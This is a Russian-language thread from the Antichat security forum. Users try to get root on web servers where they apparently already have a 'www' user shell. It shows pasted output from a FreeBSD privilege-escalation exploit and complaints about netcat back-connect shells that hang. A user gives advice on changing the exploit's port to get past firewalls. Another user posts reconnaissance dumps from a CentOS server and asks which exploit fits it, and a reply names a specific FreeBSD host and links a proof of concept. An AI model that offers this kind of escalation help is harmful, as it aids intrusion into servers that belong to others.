ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Консоль починили Сплоиты - не пашут... почему-то оба нетката вешаюся после минуты где-то и не реагируют. , а

/tmp/sh так и не меняет атрибуты....

glibs не работает тоже...

меня заинтересовала уязвимость

http://www.opennet.ru/opennews/art.shtml?num=31887

http://security.freebsd.org/advisories/FreeBSD-SA-11:05.unix.asc

но не могу понять, как ей пользоваться...

Может есть эксплоит у кого-нибудь?

Там в теме на рдоте 14-й пост - этот вариант использования сплойта не требует двух окон терминала а также копирования файла /bin/sh . также после него не вещаются окна бекконекта! И раз ты пролез в ту тему, почему не почитать хотя бы первые 2-3 страницы темы полностью ? Тогда бы ты сам знал, что если сплойт не срабатывает, то нужно попробовать в исходном коде сплойта изменить порт, который используется в сплойте т.к. порт по умолчанию может быть просто заблокирован в фаерволе!

По поводу:

http://www.opennet.ru/opennews/art.shtml?num=31887 - единственный вариант, написать сплойт самому!

Я пробовал этот вариант (14 пост) впервую очередь!!!

Другой порт не пробовал, т.к. коннект происходит и абракадара бежит... потом просто вешается

По поводунаписать самому - не догоняю как это сделать

в варианте с 14-го поста, всего 1 окно терминала, соответственно никаких иероглифов быть не может....

покажите вывод консоли после запуска сплойта с 14-го поста...

там не более 10 строк вывод должен быть

Ну из 14-го поста не абракадабра, конечно:

$./exploit

su: Sorry

[+] checking for setuid /usr/bin/su binary...

[+] checking for suitable libc library in /lib...

[+] found libc at /lib/libc.so.7

[+] found getuid function at 0x00056990

[+] target: 0x00056990, adjusted: 0x00056190, writes: 1377

[+] spawning listener thread...

[+] connecting to listener thread...

[+] initiating exploit via sendfile...

[+] exploit complete!

[+] spawning root shell...

$id

uid=80(www) gid=80(www) groups=80(www)

а вот с других модификаций - абракадабра...и вешает оба нетката.......

По поводу: http://www.opennet.ru/opennews/art.shtml?num=31887 есть у кого-нибудь "специально сформированный файл" ?

Что посоветуете?

OS version: Linux version 2.6.32-71.29.1.el6.x86_64 (gcc version 4.4.4 20100726 (Red Hat 4.4.4-13) (GCC) ) #1 SMP Mon Jun 27 19:49:27 BST 2011

Distr name:

CentOS Linux release 6.0 (Final)

Kernel \r on an \m

============

$ ls -la /boot

total 47600

dr-xr-xr-x. 5 root root 4096 Oct 10 13:49 .

dr-xr-xr-x. 24 root root 4096 Oct 17 14:16 ..

-rw-r--r--. 1 root root 170 Jun 27 20:08 .vmlinuz-2.6.32-71.29.1.el6.x86_64.hmac

-rw-r--r--. 1 root root 165 May 20 04:29 .vmlinuz-2.6.32-71.el6.x86_64.hmac

-rw-r--r--. 1 root root 2228188 Jun 27 20:08 System.map-2.6.32-71.29.1.el6.x86_64

-rw-r--r--. 1 root root 2226490 May 20 04:29 System.map-2.6.32-71.el6.x86_64

-rw-r--r--. 1 root root 97911 Jun 27 20:08 config-2.6.32-71.29.1.el6.x86_64

-rw-r--r--. 1 root root 97862 May 20 04:29 config-2.6.32-71.el6.x86_64

drwxr-xr-x. 3 root root 4096 Oct 10 12:56 efi

drwxr-xr-x. 2 root root 4096 Oct 10 13:35 grub

-rw-r--r--. 1 root root 13425525 Oct 10 13:35 initramfs-2.6.32-71.29.1.el6.x86_64.img

-rw-r--r--. 1 root root 13419042 Oct 10 12:57 initramfs-2.6.32-71.el6.x86_64.img

-rw-r--r--. 1 root root 4638583 Oct 10 13:49 initrd-2.6.32-71.29.1.el6.x86_64kdump.img

-rw-r--r--. 1 root root 4636770 Oct 10 13:25 initrd-2.6.32-71.el6.x86_64kdump.img

drwx------. 2 root root 16384 Oct 10 10:54 lost+found

-rw-r--r--. 1 root root 160602 Jun 27 20:11 symvers-2.6.32-71.29.1.el6.x86_64.gz

-rw-r--r--. 1 root root 160542 May 20 04:29 symvers-2.6.32-71.el6.x86_64.gz

-rwxr-xr-x. 1 root root 3795744 Jun 27 20:08 vmlinuz-2.6.32-71.29.1.el6.x86_64

-rwxr-xr-x. 1 root root 3791040 May 20 04:29 vmlinuz-2.6.32-71.el6.x86_64

================================================== ====

$ mount

/dev/sda7 on / type ext4 (rw)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

devpts on /dev/pts type devpts (rw,gid=5,mode=620)

tmpfs on /dev/shm type tmpfs (rw)

/dev/sda1 on /boot type ext4 (rw)

/dev/sda6 on /tmp type ext4 (rw,noexec,nosuid)

/dev/sda2 on /usr type ext4 (rw)

/dev/sda3 on /var type ext4 (rw)

/dev/sdb1 on /home type ext4 (rw,noatime)

/dev/sdc1 on /backup type ext4 (rw)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

================================================== ====

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/sda7 21G 441M 20G 3% /

tmpfs 16G 0 16G 0% /dev/shm

/dev/sda1 1008M 81M 877M 9% /boot

/dev/sda6 2.0G 118M 1.8G 7% /tmp

/dev/sda2 20G 2.8G 16G 15% /usr

/dev/sda3 20G 2.3G 17G 13% /var

/dev/sdb1 3.6T 793G 2.8T 22% /home

/dev/sdc1 2.7T 808G 1.9T 30% /backup

================================================== ====

$ cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# For details see man 4 crontabs

# Example of job definition:

# .---------------- minute (0 - 59)

# | .------------- hour (0 - 23)

# | | .---------- day of month (1 - 31)

# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...

# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

# | | | | |

# * * * * * command to be executed

================================================== ====

$ cat /proc/sys/vm/mmap_min_addr

4096

SergioBlog,

ничего!

FreeBSD www.pl.ru 7.0-RELEASE FreeBSD 7.0-RELEASE #4: Thu Apr 24 04:55:37 UTC 2008 ***:/usr/obj/usr/src/sys/SMP7PAE i386

Пробуй http://www.securitylab.ru/poc/extra/370448.php